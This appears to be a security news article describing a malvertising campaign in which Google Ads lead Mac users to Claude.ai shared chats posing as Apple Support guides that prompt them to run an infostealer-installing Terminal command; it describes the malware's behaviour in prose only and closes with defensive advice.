There’s currently a troubling trend where attackers are using Google Ads and real chats from Claude.ai to spread malware. If you search for “Claude mac download,” you might see sponsored links that seem to lead to the official site but actually guide you to install harmful software on your Mac.
This was brought to attention by security engineer Berk Albayrak, who posted his findings on LinkedIn. He discovered a Claude.ai shared chat that looks like an official guide for installing Claude on a Mac, supposedly from “Apple Support.” This chat instructs users to open Terminal and execute a command that downloads and runs malware without their knowledge.
An investigation by BleepingComputer found a second chat using a similar tactic. Both follow a familiar structure and approach, yet use different domains and methods to deliver malware. At the time of reporting, these dangerous chats were still publicly accessible.
What’s the Malware Doing?
The malware works by downloading an encoded shell script from various domains. This script is designed to run in memory, leaving minimal traces on the hard drive. BleepingComputer noted that the malware uses a technique called polymorphic delivery, changing its form each time to evade detection by security tools.
Once executed, the malware checks the system for specific keyboard settings related to Russian or CIS regions, and if found, it halts further actions. This raises concerns that the attackers are selectively targeting their victims. If the system passes this check, it collects data like the external IP, hostname, and operating system version before proceeding with malicious activities.
The script can also harvest sensitive information, including browser cookies and passwords stored in the macOS Keychain. Albayrak mentioned that one variant of the malware resembles the MacSync infostealer, indicating it’s a well-known threat.
Legitimacy Can Be Deceptive
Malvertising, or malicious advertising, has become a common strategy for malware distribution. In past instances, ads would lead users to fake sites. However, this campaign takes it a step further by pointing directly to Anthropic’s real domain, claude.ai. Attackers hide malicious content within legitimate-looking platforms.
This isn’t the first time AI platforms have been targeted. Similar campaigns affecting ChatGPT and Grok surfaced recently, emphasizing the need for users to proceed with caution. It’s always safer to visit official sites directly for downloads rather than clicking on ads.
To avoid falling victim to such attacks, it’s wise to be skeptical of any instructions asking you to input commands, even if they seem credible. Always refer to official documentation for guidance.
For further readings on security threats and how to stay protected, check out [BleepingComputer](https://www.bleepingcomputer.com). They provide ongoing updates about similar incidents and offer important tips for safeguarding your data.
